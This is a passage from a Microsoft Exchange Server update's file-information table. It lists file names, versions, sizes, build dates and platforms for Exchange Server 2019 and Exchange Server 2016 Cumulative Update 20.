\nMicrosoft.exchange.workingset.signalapi.dll| 15.2.792.15| 17,288| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.workingsetabstraction.signalapiabstraction.dll| 15.2.792.15| 29,048| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.workloadmanagement.dll| 15.2.792.15| 505,216| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.workloadmanagement.eventlogs.dll| 15.2.792.15| 14,736| 27-Apr-21| 11:34| x64 \nMicrosoft.exchange.workloadmanagement.throttling.configuration.dll| 15.2.792.15| 36,744| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.workloadmanagement.throttling.dll| 15.2.792.15| 66,448| 27-Apr-21| 11:33| x86 \nMicrosoft.fast.contextlogger.json.dll| 15.2.792.15| 19,344| 27-Apr-21| 11:33| x86 \nMicrosoft.filtering.dll| 15.2.792.15| 113,024| 27-Apr-21| 11:33| x86 \nMicrosoft.filtering.exchange.dll| 15.2.792.15| 57,224| 27-Apr-21| 11:32| x86 \nMicrosoft.filtering.interop.dll| 15.2.792.15| 15,248| 27-Apr-21| 11:34| x86 \nMicrosoft.forefront.activedirectoryconnector.dll| 15.2.792.15| 46,984| 27-Apr-21| 11:33| x86 \nMicrosoft.forefront.activedirectoryconnector.eventlog.dll| 15.2.792.15| 15,752| 27-Apr-21| 11:33| x64 \nMicrosoft.forefront.filtering.common.dll| 15.2.792.15| 23,944| 27-Apr-21| 11:33| x86 \nMicrosoft.forefront.filtering.diagnostics.dll| 15.2.792.15| 22,392| 27-Apr-21| 11:32| x86 \nMicrosoft.forefront.filtering.eventpublisher.dll| 15.2.792.15| 34,696| 27-Apr-21| 11:33| x86 \nMicrosoft.forefront.management.powershell.format.ps1xml| Not applicable| 48,898| 27-Apr-21| 11:32| Not applicable \nMicrosoft.forefront.management.powershell.types.ps1xml| Not applicable| 16,317| 27-Apr-21| 11:33| Not applicable \nMicrosoft.forefront.monitoring.activemonitoring.local.components.dll| 15.2.792.15| 1,518,456| 27-Apr-21| 11:32| x86 \nMicrosoft.forefront.monitoring.activemonitoring.local.components.messages.dll| 15.2.792.15| 13,192| 27-Apr-21| 11:34| x64 \nMicrosoft.forefront.monitoring.management.outsidein.dll| 15.2.792.15| 33,152| 27-Apr-21| 11:33| x86 \nMicrosoft.forefront.recoveryactionarbiter.contract.dll| 15.2.792.15| 18,320| 27-Apr-21| 11:33| x86 \nMicrosoft.forefront.reporting.common.dll| 15.2.792.15| 46,472| 27-Apr-21| 11:33| x86 \nMicrosoft.forefront.reporting.ondemandquery.dll| 15.2.792.15| 50,568| 27-Apr-21| 11:34| x86 \nMicrosoft.isam.esent.collections.dll| 15.2.792.15| 72,568| 27-Apr-21| 11:33| x86 \nMicrosoft.isam.esent.interop.dll| 15.2.792.15| 541,560| 27-Apr-21| 11:32| x86 \nMicrosoft.managementgui.dll| 15.2.792.15| 133,496| 27-Apr-21| 11:33| x86 \nMicrosoft.mce.interop.dll| 15.2.792.15| 24,448| 27-Apr-21| 11:32| x86 \nMicrosoft.office.audit.dll| 15.2.792.15| 124,808| 27-Apr-21| 11:33| x86 \nMicrosoft.office.client.discovery.unifiedexport.dll| 15.2.792.15| 593,272| 27-Apr-21| 11:33| x86 \nMicrosoft.office.common.ipcommonlogger.dll| 15.2.792.15| 42,360| 27-Apr-21| 11:33| x86 \nMicrosoft.office.compliance.console.core.dll| 15.2.792.15| 217,984| 27-Apr-21| 11:31| x86 \nMicrosoft.office.compliance.console.dll| 15.2.792.15| 854,904| 27-Apr-21| 11:33| x86 \nMicrosoft.office.compliance.console.extensions.dll| 15.2.792.15| 485,768| 27-Apr-21| 11:30| x86 \nMicrosoft.office.compliance.core.dll| 15.2.792.15| 413,048| 27-Apr-21| 11:32| x86 \nMicrosoft.office.compliance.ingestion.dll| 15.2.792.15| 36,216| 27-Apr-21| 11:33| x86 \nMicrosoft.office.compliancepolicy.exchange.dar.dll| 15.2.792.15| 84,856| 27-Apr-21| 11:32| x86 \nMicrosoft.office.compliancepolicy.platform.dll| 15.2.792.15| 1,782,160| 27-Apr-21| 11:32| x86 \nMicrosoft.office.datacenter.activemonitoring.management.common.dll| 15.2.792.15| 49,528| 27-Apr-21| 11:32| x86 \nMicrosoft.office.datacenter.activemonitoring.management.dll| 15.2.792.15| 27,512| 27-Apr-21| 11:33| x86 \nMicrosoft.office.datacenter.activemonitoringlocal.dll| 15.2.792.15| 174,968| 27-Apr-21| 11:33| x86 \nMicrosoft.office.datacenter.monitoring.activemonitoring.recovery.dll| 15.2.792.15| 166,280| 27-Apr-21| 11:33| x86 \nMicrosoft.office365.datainsights.uploader.dll| 15.2.792.15| 40,336| 27-Apr-21| 11:30| x86 \nMicrosoft.online.box.shell.dll| 15.2.792.15| 46,480| 27-Apr-21| 11:30| x86 \nMicrosoft.powershell.hostingtools.dll| 15.2.792.15| 67,984| 27-Apr-21| 11:30| x86 \nMicrosoft.powershell.hostingtools_2.dll| 15.2.792.15| 67,984| 27-Apr-21| 11:30| x86 \nMicrosoft.tailoredexperiences.core.dll| 15.2.792.15| 120,184| 27-Apr-21| 11:32| x86 \nMigrateumcustomprompts.ps1| Not applicable| 19,118| 27-Apr-21| 11:34| Not applicable \nModernpublicfoldertomailboxmapgenerator.ps1| Not applicable| 29,084| 27-Apr-21| 11:34| Not applicable \nMovemailbox.ps1| Not applicable| 61,180| 27-Apr-21| 11:33| Not applicable \nMovetransportdatabase.ps1| Not applicable| 30,586| 27-Apr-21| 11:34| Not applicable \nMove_publicfolderbranch.ps1| Not applicable| 17,552| 27-Apr-21| 11:34| Not applicable \nMpgearparser.dll| 15.2.792.15| 99,704| 27-Apr-21| 11:33| x64 \nMsclassificationadapter.dll| 15.2.792.15| 248,720| 27-Apr-21| 11:30| x64 \nMsexchangecompliance.exe| 15.2.792.15| 78,736| 27-Apr-21| 11:33| x86 \nMsexchangedagmgmt.exe| 15.2.792.15| 25,488| 27-Apr-21| 11:33| x86 \nMsexchangedelivery.exe| 15.2.792.15| 38,800| 27-Apr-21| 11:33| x86 \nMsexchangefrontendtransport.exe| 15.2.792.15| 31,608| 27-Apr-21| 11:33| x86 \nMsexchangehmhost.exe| 15.2.792.15| 27,016| 27-Apr-21| 11:33| x86 \nMsexchangehmrecovery.exe| 15.2.792.15| 29,576| 27-Apr-21| 11:33| x86 \nMsexchangemailboxassistants.exe| 15.2.792.15| 72,592| 27-Apr-21| 11:33| x86 \nMsexchangemailboxreplication.exe| 15.2.792.15| 20,880| 27-Apr-21| 11:33| x86 \nMsexchangemigrationworkflow.exe| 15.2.792.15| 68,984| 27-Apr-21| 11:33| x86 \nMsexchangerepl.exe| 15.2.792.15| 71,056| 27-Apr-21| 11:33| x86 \nMsexchangesubmission.exe| 15.2.792.15| 123,256| 27-Apr-21| 11:32| x86 \nMsexchangethrottling.exe| 15.2.792.15| 39,824| 27-Apr-21| 11:33| x86 \nMsexchangetransport.exe| 15.2.792.15| 74,104| 27-Apr-21| 11:33| x86 \nMsexchangetransportlogsearch.exe| 15.2.792.15| 139,144| 27-Apr-21| 11:33| x86 \nMsexchangewatchdog.exe| 15.2.792.15| 55,672| 27-Apr-21| 11:33| x64 \nMspatchlinterop.dll| 15.2.792.15| 53,632| 27-Apr-21| 11:33| x64 \nNativehttpproxy.dll| 15.2.792.15| 91,520| 27-Apr-21| 11:35| x64 \nNavigatorparser.dll| 15.2.792.15| 636,792| 27-Apr-21| 11:33| x64 \nNego2nativeinterface.dll| 15.2.792.15| 19,320| 27-Apr-21| 11:32| x64 \nNegotiateclientcertificatemodule.dll| 15.2.792.15| 30,088| 27-Apr-21| 11:34| x64 \nNewtestcasconnectivityuser.ps1| Not applicable| 19,744| 27-Apr-21| 11:34| Not applicable \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 24,599| 27-Apr-21| 11:34| Not applicable \nNtspxgen.dll| 15.2.792.15| 80,784| 27-Apr-21| 11:33| x64 \nOleconverter.exe| 15.2.792.15| 173,952| 27-Apr-21| 11:33| x64 \nOutsideinmodule.dll| 15.2.792.15| 87,944| 27-Apr-21| 11:33| x64 \nOwaauth.dll| 15.2.792.15| 92,040| 27-Apr-21| 11:33| x64 \nPerf_common_extrace.dll| 15.2.792.15| 245,128| 27-Apr-21| 11:32| x64 \nPerf_exchmem.dll| 15.2.792.15| 86,400| 27-Apr-21| 11:33| x64 \nPipeline2.dll| 15.2.792.15| 1,454,472| 27-Apr-21| 11:32| x64 \nPreparemoverequesthosting.ps1| Not applicable| 70,995| 27-Apr-21| 11:34| Not applicable \nPrepare_moverequest.ps1| Not applicable| 73,229| 27-Apr-21| 11:33| Not applicable \nProductinfo.managed.dll| 15.2.792.15| 27,016| 27-Apr-21| 11:33| x86 \nProxybinclientsstringsdll| 15.2.792.15| 924,552| 27-Apr-21| 11:34| x86 \nPublicfoldertomailboxmapgenerator.ps1| Not applicable| 23,258| 27-Apr-21| 11:34| Not applicable \nQuietexe.exe| 15.2.792.15| 14,728| 27-Apr-21| 11:32| x86 \nRedistributeactivedatabases.ps1| Not applicable| 250,532| 27-Apr-21| 11:33| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 21,635| 27-Apr-21| 11:34| Not applicable \nRemoteexchange.ps1| Not applicable| 23,557| 27-Apr-21| 11:34| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 14,668| 27-Apr-21| 11:34| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 15,002| 27-Apr-21| 11:34| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 14,996| 27-Apr-21| 11:34| Not applicable \nReplaycrimsonmsg.dll| 15.2.792.15| 1,104,784| 27-Apr-21| 11:33| x64 \nResetattachmentfilterentry.ps1| Not applicable| 15,460| 27-Apr-21| 11:34| Not applicable \nResetcasservice.ps1| Not applicable| 21,727| 27-Apr-21| 11:34| Not applicable \nReset_antispamupdates.ps1| Not applicable| 14,085| 27-Apr-21| 11:34| Not applicable \nRestoreserveronprereqfailure.ps1| Not applicable| 15,153| 27-Apr-21| 11:33| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 17,190| 27-Apr-21| 11:34| Not applicable \nRightsmanagementwrapper.dll| 15.2.792.15| 86,416| 27-Apr-21| 11:32| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,810| 27-Apr-21| 11:34| Not applicable \nRpcperf.dll| 15.2.792.15| 23,440| 27-Apr-21| 11:34| x64 \nRpcproxyshim.dll| 15.2.792.15| 39,312| 27-Apr-21| 11:32| x64 \nRulesauditmsg.dll| 15.2.792.15| 12,664| 27-Apr-21| 11:33| x64 \nSafehtmlnativewrapper.dll| 15.2.792.15| 34,680| 27-Apr-21| 11:34| x64 \nScanenginetest.exe| 15.2.792.15| 956,280| 27-Apr-21| 11:32| x64 \nScanningprocess.exe| 15.2.792.15| 738,704| 27-Apr-21| 11:32| x64 \nSearchdiagnosticinfo.ps1| Not applicable| 16,812| 27-Apr-21| 11:34| Not applicable \nServicecontrol.ps1| Not applicable| 52,313| 27-Apr-21| 11:33| Not applicable \nSetmailpublicfolderexternaladdress.ps1| Not applicable| 20,738| 27-Apr-21| 11:34| Not applicable \nSettingsadapter.dll| 15.2.792.15| 116,104| 27-Apr-21| 11:35| x64 \nSetup.exe| 15.2.792.15| 20,360| 27-Apr-21| 11:33| x86 \nSetupui.exe| 15.2.792.15| 188,304| 27-Apr-21| 11:34| x86 \nSplit_publicfoldermailbox.ps1| Not applicable| 52,209| 27-Apr-21| 11:34| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 27,831| 27-Apr-21| 11:33| Not applicable \nStatisticsutil.dll| 15.2.792.15| 142,208| 27-Apr-21| 11:33| x64 \nStopdagservermaintenance.ps1| Not applicable| 21,113| 27-Apr-21| 11:34| Not applicable \nStoretsconstants.ps1| Not applicable| 15,850| 27-Apr-21| 11:34| Not applicable \nStoretslibrary.ps1| Not applicable| 28,003| 27-Apr-21| 11:34| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 15.2.792.15| 28,536| 27-Apr-21| 11:36| x64 \nSync_mailpublicfolders.ps1| Not applicable| 43,927| 27-Apr-21| 11:34| Not applicable \nSync_modernmailpublicfolders.ps1| Not applicable| 43,973| 27-Apr-21| 11:34| Not applicable \nTextconversionmodule.dll| 15.2.792.15| 86,392| 27-Apr-21| 11:32| x64 \nTroubleshoot_ci.ps1| Not applicable| 22,747| 27-Apr-21| 11:34| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 33,453| 27-Apr-21| 11:34| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 30,049| 27-Apr-21| 11:33| Not applicable \nUninstall_antispamagents.ps1| Not applicable| 15,457| 27-Apr-21| 11:34| Not applicable \nUpdateapppoolmanagedframeworkversion.ps1| Not applicable| 14,030| 27-Apr-21| 11:34| Not applicable \nUpdatecas.ps1| Not applicable| 35,818| 27-Apr-21| 11:33| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 19,726| 27-Apr-21| 11:32| Not applicable \nUpdateserver.exe| 15.2.792.15| 3,014,520| 27-Apr-21| 11:32| x64 \nUpdate_malwarefilteringserver.ps1| Not applicable| 18,136| 27-Apr-21| 11:34| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 31,814| 27-Apr-21| 11:35| Not applicable \nWsbexchange.exe| 15.2.792.15| 125,304| 27-Apr-21| 11:33| x64 \nX400prox.dll| 15.2.792.15| 103,304| 27-Apr-21| 11:36| x64 \n_search.lingoperators.a| 15.2.792.15| 34,680| 27-Apr-21| 11:34| Not applicable \n_search.lingoperators.b| 15.2.792.15| 34,680| 27-Apr-21| 11:34| Not applicable \n_search.mailboxoperators.a| 15.2.792.15| 290,168| 27-Apr-21| 11:34| Not applicable \n_search.mailboxoperators.b| 15.2.792.15| 290,168| 27-Apr-21| 11:34| Not applicable \n_search.operatorschema.a| 15.2.792.15| 485,768| 27-Apr-21| 11:30| Not applicable \n_search.operatorschema.b| 15.2.792.15| 485,768| 27-Apr-21| 11:30| Not applicable \n_search.tokenoperators.a| 15.2.792.15| 113,544| 27-Apr-21| 11:31| Not applicable \n_search.tokenoperators.b| 15.2.792.15| 113,544| 27-Apr-21| 11:31| Not applicable \n_search.transportoperators.a| 15.2.792.15| 67,960| 27-Apr-21| 11:30| Not applicable \n_search.transportoperators.b| 15.2.792.15| 67,960| 27-Apr-21| 11:30| Not applicable \n \n### \n\n__\n\nMicrosoft Exchange Server 2016 Cumulative Update 20\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nActivemonitoringeventmsg.dll| 15.1.2242.10| 71,048| 27-Apr-21| 12:50| x64 \nActivemonitoringexecutionlibrary.ps1| Not applicable| 29,530| 27-Apr-21| 12:50| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 14,925| 27-Apr-21| 12:50| Not applicable \nAdemodule.dll| 15.1.2242.10| 106,360| 27-Apr-21| 12:49| x64 \nAirfilter.dll| 15.1.2242.10| 42,896| 27-Apr-21| 12:50| x64 \nAjaxcontroltoolkit.dll| 15.1.2242.10| 92,552| 27-Apr-21| 12:48| x86 \nAntispamcommon.ps1| Not applicable| 13,481| 27-Apr-21| 12:50| Not applicable \nAsdat.msi| Not applicable| 5,087,232| 27-Apr-21| 12:50| Not applicable \nAsentirs.msi| Not applicable| 77,824| 27-Apr-21| 12:48| Not applicable \nAsentsig.msi| Not applicable| 73,728| 27-Apr-21| 12:49| Not applicable \nBigfunnel.bondtypes.dll| 15.1.2242.10| 43,896| 27-Apr-21| 12:49| x86 \nBigfunnel.common.dll| 15.1.2242.10| 63,880| 27-Apr-21| 12:49| x86 \nBigfunnel.configuration.dll| 15.1.2242.10| 99,208| 27-Apr-21| 12:49| x86 \nBigfunnel.entropy.dll| 15.1.2242.10| 44,432| 27-Apr-21| 12:50| x86 \nBigfunnel.filter.dll| 15.1.2242.10| 54,136| 27-Apr-21| 12:50| x86 \nBigfunnel.indexstream.dll| 15.1.2242.10| 54,160| 27-Apr-21| 12:49| x86 \nBigfunnel.poi.dll| 15.1.2242.10| 203,648| 27-Apr-21| 12:49| x86 \nBigfunnel.postinglist.dll| 15.1.2242.10| 122,232| 27-Apr-21| 12:49| x86 \nBigfunnel.query.dll| 15.1.2242.10| 99,704| 27-Apr-21| 12:49| x86 \nBigfunnel.ranking.dll| 15.1.2242.10| 79,224| 27-Apr-21| 12:50| x86 \nBigfunnel.syntheticdatalib.dll| 15.1.2242.10| 3,634,568| 27-Apr-21| 12:49| x86 \nBigfunnel.wordbreakers.dll| 15.1.2242.10| 46,472| 27-Apr-21| 12:50| x86 \nCafe_airfilter_dll| 15.1.2242.10| 42,896| 27-Apr-21| 12:50| x64 \nCafe_exppw_dll| 15.1.2242.10| 83,320| 27-Apr-21| 12:48| x64 \nCafe_owaauth_dll| 15.1.2242.10| 92,024| 27-Apr-21| 12:48| x64 \nCalcalculation.ps1| Not applicable| 42,109| 27-Apr-21| 12:50| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 94,602| 27-Apr-21| 12:50| Not applicable \nChksgfiles.dll| 15.1.2242.10| 57,232| 27-Apr-21| 12:50| x64 \nCitsconstants.ps1| Not applicable| 15,801| 27-Apr-21| 12:50| Not applicable \nCitslibrary.ps1| Not applicable| 82,696| 27-Apr-21| 12:50| Not applicable \nCitstypes.ps1| Not applicable| 14,456| 27-Apr-21| 12:50| Not applicable \nClassificationengine_mce| 15.1.2242.10| 1,693,064| 27-Apr-21| 12:48| Not applicable \nClusmsg.dll| 15.1.2242.10| 134,032| 27-Apr-21| 12:50| x64 \nCoconet.dll| 15.1.2242.10| 48,008| 27-Apr-21| 12:49| x64 \nCollectovermetrics.ps1| Not applicable| 81,656| 27-Apr-21| 12:50| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 41,866| 27-Apr-21| 12:50| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 29,963| 27-Apr-21| 12:49| Not applicable \nComplianceauditservice.exe| 15.1.2242.10| 39,816| 27-Apr-21| 12:50| x86 \nConfigureadam.ps1| Not applicable| 22,760| 27-Apr-21| 12:50| Not applicable \nConfigurecaferesponseheaders.ps1| Not applicable| 20,304| 27-Apr-21| 12:50| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,766| 27-Apr-21| 12:50| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,824| 27-Apr-21| 12:50| Not applicable \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,279| 27-Apr-21| 12:50| Not applicable \nConnectfunctions.ps1| Not applicable| 37,157| 27-Apr-21| 12:50| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 30,412| 27-Apr-21| 12:50| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,264| 27-Apr-21| 12:49| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,049| 27-Apr-21| 12:50| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,564| 27-Apr-21| 12:50| Not applicable \nConvert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,761| 27-Apr-21| 12:50| Not applicable \nCreate_publicfoldermailboxesformigration.ps1| Not applicable| 27,904| 27-Apr-21| 12:50| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 27-Apr-21| 12:50| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 27-Apr-21| 12:50| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 27-Apr-21| 12:50| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 27-Apr-21| 12:50| Not applicable \nCts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 27-Apr-21| 12:50| Not applicable \nCts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 27-Apr-21| 12:50| Not applicable \nCts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 27-Apr-21| 12:50| Not applicable \nCts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 27-Apr-21| 12:50| Not applicable \nCts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 27-Apr-21| 12:50| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 27-Apr-21| 12:50| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 27-Apr-21| 12:50| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 27-Apr-21| 12:50| Not applicable \nCts_exsmime.dll| 15.1.2242.10| 380,816| 27-Apr-21| 12:49| x64 \nCts_microsoft.exchange.data.common.dll| 15.1.2242.10| 1,686,928| 27-Apr-21| 12:49| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 27-Apr-21| 12:50| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 15.1.2242.10| 13,200| 27-Apr-21| 12:50| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 15.1.2242.10| 13,200| 27-Apr-21| 12:50| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 15.1.2242.10| 13,200| 27-Apr-21| 12:50| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 15.1.2242.10| 13,200| 27-Apr-21| 12:50| x86 \nCts_policy.14.4.microsoft.exchange.data.common.dll| 15.1.2242.10| 13,176| 27-Apr-21| 12:50| x86 \nCts_policy.15.0.microsoft.exchange.data.common.dll| 15.1.2242.10| 13,200| 27-Apr-21| 12:50| x86 \nCts_policy.15.1.microsoft.exchange.data.common.dll| 15.1.2242.10| 13,176| 27-Apr-21| 12:50| x86 \nCts_policy.15.2.microsoft.exchange.data.common.dll| 15.1.2242.10| 13,184| 27-Apr-21| 12:50| x86 \nCts_policy.15.20.microsoft.exchange.data.common.dll| 15.1.2242.10| 13,200| 27-Apr-21| 12:50| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 15.1.2242.10| 12,688| 27-Apr-21| 12:50| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 15.1.2242.10| 12,664| 27-Apr-21| 12:50| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 15.1.2242.10| 12,664| 27-Apr-21| 12:50| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 15.1.2242.10| 12,688| 27-Apr-21| 12:50| x86 \nDagcommonlibrary.ps1| Not applicable| 60,258| 27-Apr-21| 12:49| Not applicable \nDependentassemblygenerator.exe| 15.1.2242.10| 22,416| 27-Apr-21| 12:50| x86 \nDiaghelper.dll| 15.1.2242.10| 66,960| 27-Apr-21| 12:49| x86 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,366| 27-Apr-21| 12:49| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,394| 27-Apr-21| 12:50| Not applicable \nDisable_antimalwarescanning.ps1| Not applicable| 15,185| 27-Apr-21| 12:50| Not applicable \nDisable_outsidein.ps1| Not applicable| 13,686| 27-Apr-21| 12:50| Not applicable \nDisklockerapi.dll| Not applicable| 22,392| 27-Apr-21| 12:50| x64 \nDlmigrationmodule.psm1| Not applicable| 39,612| 27-Apr-21| 12:50| Not applicable \nDsaccessperf.dll| 15.1.2242.10| 45,960| 27-Apr-21| 12:50| x64 \nDscperf.dll| 15.1.2242.10| 32,648| 27-Apr-21| 12:50| x64 \nDup_cts_microsoft.exchange.data.common.dll| 15.1.2242.10| 1,686,928| 27-Apr-21| 12:49| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 15.1.2242.10| 601,488| 27-Apr-21| 12:48| x86 \nEcpperfcounters.xml| Not applicable| 31,160| 27-Apr-21| 12:50| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 27-Apr-21| 12:50| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.1.2242.10| 13,200| 27-Apr-21| 12:50| x86 \nEdgetransport.exe| 15.1.2242.10| 49,528| 27-Apr-21| 12:50| x86 \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 27-Apr-21| 12:50| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 27-Apr-21| 12:50| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 27-Apr-21| 12:50| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 27-Apr-21| 12:50| Not applicable \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 27-Apr-21| 12:50| Not applicable \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 27-Apr-21| 12:50| Not applicable \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 27-Apr-21| 12:50| Not applicable \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 27-Apr-21| 12:50| Not applicable \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 27-Apr-21| 12:50| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 27-Apr-21| 12:50| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 27-Apr-21| 12:50| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 27-Apr-21| 12:50| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.1.2242.10| 13,200| 27-Apr-21| 12:50| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.1.2242.10| 13,192| 27-Apr-21| 12:50| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.1.2242.10| 13,176| 27-Apr-21| 12:50| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.1.2242.10| 13,200| 27-Apr-21| 12:50| x86 \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.1.2242.10| 13,200| 27-Apr-21| 12:50| x86 \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.1.2242.10| 13,176| 27-Apr-21| 12:50| x86 \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.1.2242.10| 13,176| 27-Apr-21| 12:50| x86 \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.1.2242.10| 13,192| 27-Apr-21| 12:50| x86 \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.1.2242.10| 13,176| 27-Apr-21| 12:50| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.1.2242.10| 13,200| 27-Apr-21| 12:50| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.1.2242.10| 13,176| 27-Apr-21| 12:50| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.1.2242.10| 13,200| 27-Apr-21| 12:50| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,376| 27-Apr-21| 12:50| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,555| 27-Apr-21| 12:50| Not applicable \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,584| 27-Apr-21| 12:50| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,594| 27-Apr-21| 12:50| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,912| 27-Apr-21| 12:50| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,639| 27-Apr-21| 12:50| Not applicable \nEngineupdateserviceinterfaces.dll| 15.1.2242.10| 17,808| 27-Apr-21| 12:49| x86 \nEscprint.dll| 15.1.2242.10| 20,344| 27-Apr-21| 12:50| x64 \nEse.dll| 15.1.2242.10| 3,695,496| 27-Apr-21| 12:50| x64 \nEseback2.dll| 15.1.2242.10| 325,008| 27-Apr-21| 12:50| x64 \nEsebcli2.dll| 15.1.2242.10| 292,752| 27-Apr-21| 12:50| x64 \nEseperf.dll| 15.1.2242.10| 116,112| 27-Apr-21| 12:50| x64 \nEseutil.exe| 15.1.2242.10| 398,736| 27-Apr-21| 12:50| x64 \nEsevss.dll| 15.1.2242.10| 44,432| 27-Apr-21| 12:50| x64 \nEtweseproviderresources.dll| 15.1.2242.10| 82,296| 27-Apr-21| 12:50| x64 \nEventperf.dll| 15.1.2242.10| 59,792| 27-Apr-21| 12:48| x64 \nExchange.depthtwo.types.ps1xml| Not applicable| 40,132| 27-Apr-21| 12:50| Not applicable \nExchange.format.ps1xml| Not applicable| 648,635| 27-Apr-21| 12:50| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 43,349| 27-Apr-21| 12:50| Not applicable \nExchange.ps1| Not applicable| 20,803| 27-Apr-21| 12:50| Not applicable \nExchange.support.format.ps1xml| Not applicable| 26,531| 27-Apr-21| 12:50| Not applicable \nExchange.types.ps1xml| Not applicable| 365,172| 27-Apr-21| 12:50| Not applicable \nExchangeudfcommon.dll| 15.1.2242.10| 121,720| 27-Apr-21| 12:50| x86 \nExchangeudfs.dll| 15.1.2242.10| 269,712| 27-Apr-21| 12:50| x86 \nExchmem.dll| 15.1.2242.10| 85,896| 27-Apr-21| 12:48| x64 \nExchsetupmsg.dll| 15.1.2242.10| 19,344| 27-Apr-21| 12:50| x64 \nExchucutil.ps1| Not applicable| 23,916| 27-Apr-21| 12:50| Not applicable \nExdbfailureitemapi.dll| Not applicable| 27,024| 27-Apr-21| 12:50| x64 \nExdbmsg.dll| 15.1.2242.10| 229,776| 